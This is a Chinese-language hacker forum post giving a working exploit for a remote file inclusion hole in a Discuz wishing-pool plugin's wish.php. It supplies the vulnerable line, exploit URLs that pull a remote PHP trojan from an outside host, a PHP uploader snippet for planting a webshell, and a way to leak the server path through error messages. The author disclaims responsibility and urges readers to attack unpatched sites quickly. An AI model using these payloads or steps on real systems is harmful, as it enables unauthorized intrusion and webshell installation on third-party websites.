PS:話說光這個漏洞《黑客X檔案》都說了N遍,呵呵........
既然有人公布了,也有人連利用程序都寫好了,那我也就公布吧!消息來源是鬼仔告訴我的,好像是火狐哪個大哥發現的洞,不太清楚了!
discuz論壇的許願池插件在DZ根目錄有個wish.php文件,文件第四行:
require $discuz_root.‘./include/discuzcode.func.php‘;
很明顯程序沒有做任何過濾,一個十足的遠程包含漏洞,具體利用方法就很簡單了:
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
別忘了後面有個問號!xxxx.txt就是我的PHP木馬,c99shell不知道為什麼,我沒成功,也許與操作系統有關,我沒仔細去實驗了,直接用的安全天使的那PHP後門,不過可以得到一個"webshell",但是用安全天使那PHP後門無法上傳我們真正的webshell上去,所以用下面這個文件就可以上傳你的WEBSHELL到網站目錄,
<?copy($_FILES[MyFile][tmp_name],"C:Inetpubvhostsaidu.combscntink.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
怎麼得到網站實際路徑呢?很簡單,直接打開http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最後那個問號,這時你會發現程序報錯了,網站的實際路徑也就出來了!修改個文件裡的
C:Inetpubvhostsaidu.combs
為當前你要黑的這個網站實際路徑;cntink.php是你上傳webshell後需要保存的名字,隨便你取什麼!
把上面那文件保存為txt(其他擴展名也可以)上傳到你自己的網站,比如我取名為fly.txt,現在再打開
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看見上傳對話框了吧,慢慢上傳你的webshell吧!上傳後的路徑就是你在fly.txt中所設置的路徑!
以上文章純屬亂寫,誰利用這方法黑了站遇到麻煩別找我....其實這玩意應該是發布補丁後才能公開的,但又不是官方的插件,而且別人都發了,無所謂了!
PS:要行動的快點,引用群裡某X的一句話: baidu google都把discuz inurl:wish.php搜完了 不過漏洞沒補